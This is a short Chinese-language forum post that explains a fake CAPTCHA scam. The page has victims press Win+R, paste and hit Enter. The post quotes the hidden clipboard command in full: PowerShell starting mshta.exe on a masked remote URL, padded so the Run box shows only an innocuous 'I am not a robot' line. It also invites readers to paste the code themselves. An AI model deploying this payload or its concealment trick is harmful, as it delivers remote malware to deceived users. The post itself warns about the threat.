【吃瓜】还得是黑产会整花活儿！

最近看到一个帖子，觉得挺有意思的，遂跟师傅们分享一下

师傅们应该有印象把，咱们访问一些网站的时候，网页有时会弹出提示，让你证明自己是真人。这种情况还是挺常见的，一般咱们都是会按照网站的要求来进行验证；但是下面这个验证方式有点不一样，验证方式是弹出提示，让你按 Win+R，然后 Ctrl+V，再回车，类似于下面这个图片：

执行前两个步骤之后，运行窗口里就会出现：

✅ 'I am not a raobot: CAPTCHAVerificationUID: 9999'。

看起来还是像那么一回事儿，但是只要再按一下回车，就完蛋咯，电脑就会下载并执行攻击者的脚本。其实在最开始点击验证窗口的时候，网站向剪贴板中写入的内容实际是：powershell -w 1 -C "$l='https://XXXXXX.XXX/XXX.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 9999' 因为 windows命令执行输入框的宽度有限，对过长的输入行只显示末尾部分(大家可以复制上面的代码去自己的运行窗口试试)。攻击者精确地控制内容长度，巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候就完蛋咯。真实受害者视角如下：

PS:素材来自钓鱼季节公众号